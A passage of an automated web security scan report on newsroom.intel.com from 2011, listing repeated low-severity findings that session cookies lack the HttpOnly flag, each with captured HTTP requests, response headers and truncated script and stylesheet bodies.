jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:19 GMT
Server: Apache
Set-Cookie: JSESSIONID=E514EB9C000C502ED588D726B4DEE54A.node6IPR; Domain=.intel.com; Path=/
X-JAL: 2
Vary: Accept-Encoding
CacheHit: D=26463 t=1296956899733157
X-JSL: D=26470 t=1296956899733157
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...

12.12. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/resources/scripts/gen/ea37d19451097ab05e95257b062f6f45.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:37 GMT
Server: Apache
Set-Cookie: JSESSIONID=EE4D59A501972634AF56AA68D8967AE2.node6IPR; Domain=.intel.com; Path=/
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=131861 t=1296956917538280
X-JSL: D=131867 t=1296956917538280
Content-Type: text/javascript;charset=UTF-8
Connection: keep-alive
Content-Length: 20313

(function(c){var a=c.scrollTo=function(f,e,d){c(window).scrollTo(f,e,d)};a.defaults={axis:"xy",duration:parseFloat(c.fn.jquery)>=1.3?0:1};a.window=function(d){return c(window).scrollable()};c.fn.scrol
...[SNIP]...

12.13. http://newsroom.intel.com/4.0.6/styles/jive-community.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-community.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-community.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=5C2FF08678A49B81193C49BCB33E4E29.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 1
Vary: Accept-Encoding
CacheHit: D=133137 t=1296956878891570
X-JSL: D=133142 t=1296956878891570
Content-Type: text/css
Connection: keep-alive
Content-Length: 20341

/*
jive-community.css - styles for the community landing page.
*/


.jive-blog-post-message h3 {
   clear: both;
float: none;
}

/* container for use on the community pages */
#jive-b
...[SNIP]...

12.14. http://newsroom.intel.com/4.0.6/styles/jive-global.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-global.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-global.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=58D180D97AB319652D509966F32227A7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=143063 t=1296956848658188
X-JSL: D=143069 t=1296956848658188
Content-Type: text/css
Connection: keep-alive
Content-Length: 208122

/* RESET STYLES (see http://meyerweb.com/eric/tools/css/reset/) */
/*
*
* this is not a straight copy/paste from the above URL. this has been
* custom modified by us. so don't go copy/paste u
...[SNIP]...

12.15. http://newsroom.intel.com/4.0.6/styles/jive-icons.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-icons.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-icons.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=8C181A1B01DBE3858DD2ECB1E90CB81F.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132982 t=1296956849476958
X-JSL: D=132987 t=1296956849476958
Content-Type: text/css
Connection: keep-alive
Content-Length: 25134

/* Things that might be sprited */
.jive-icon-plus,
.jive-icon-minus {
   /* edit widget layouts, leave before standard sprites */
   background-repeat: no-repeat;
   background-position: 0;
   padding: 2px
...[SNIP]...

12.16. http://newsroom.intel.com/4.0.6/styles/jive-sidebar.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-sidebar.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-sidebar.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=351863A282E6B8E427C3AA53A775A16B.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128681 t=1296956864616423
X-JSL: D=128686 t=1296956864616423
Content-Type: text/css
Connection: keep-alive
Content-Length: 28548

/*
jive-sidebar.css
*/
.jive-sidebar {
border: 1px solid #e5e5e5;
font-size: 1em;
margin: 0 0 25px;
overflow: hidden;
padding: 0;
position: relative; /* req for IEs */
-moz
...[SNIP]...

12.17. http://newsroom.intel.com/4.0.6/styles/jive-videomodule.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-videomodule.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-videomodule.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:59 GMT
Server: Apache
Set-Cookie: JSESSIONID=C7BC34108896684F5F49C2D9A038A463.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=128999 t=1296956879588525
X-JSL: D=129004 t=1296956879588525
Content-Type: text/css
Connection: keep-alive
Content-Length: 32219

/* videomodule.css */
/* this stylesheet contains browser-specific styles for IE6 (* html) and IE7 (*+html) */

/* Styles for creating and editing a video post */
.jive-video {
clear: both;
bo
...[SNIP]...

12.18. http://newsroom.intel.com/4.0.6/styles/jive-widgets.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/jive-widgets.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/jive-widgets.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; __utmc=174403261; __utmb=174403261.1.10.1296947569

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:48:03 GMT
Server: Apache
Set-Cookie: JSESSIONID=2ACD8803AAF9142ABE9BBE7400602B75.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=132338 t=1296956883117344
X-JSL: D=132344 t=1296956883117344
Content-Type: text/css
Connection: keep-alive
Content-Length: 84448


/* overrides for elements while customizing a page */
body.jive-body-widget-customizing #jive-body #jive-body-intro,
body.jive-body-widget-customizing #jive-body #jive-breadcrumb,
body.jive-body-wi
...[SNIP]...

12.19. http://newsroom.intel.com/4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /4.0.6/styles/tiny_mce3/plugins/inlinepopups/skins/clearlooks2/window.css HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:47:58 GMT
Server: Apache
Set-Cookie: JSESSIONID=1B1A7CDD00A68C13A37ECE38A66CD9D7.node6IPR; Domain=.intel.com; Path=/
Accept-Ranges: bytes
X-JAL: 0
Vary: Accept-Encoding
CacheHit: D=131620 t=1296956878654373
X-JSL: D=131626 t=1296956878654373
Content-Type: text/css
Connection: keep-alive
Content-Length: 9250

/* Clearlooks 2 */

/* Reset */
.clearlooks2, .clearlooks2 div, .clearlooks2 span, .clearlooks2 a {vertical-align:baseline; text-align:left; position:absolute; border:0; padding:0; margin:0; backgroun
...[SNIP]...

12.20. http://newsroom.intel.com/community/intel_newsroom/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://newsroom.intel.com
Path:   /community/intel_newsroom/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /community/intel_newsroom/?iid=ftr+press HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/about/index.htm?iid=gg_about-en_US+intel_aboutintel
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:09 GMT
Server: Apache
Set-Cookie: JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; Domain=.intel.com; Path=/
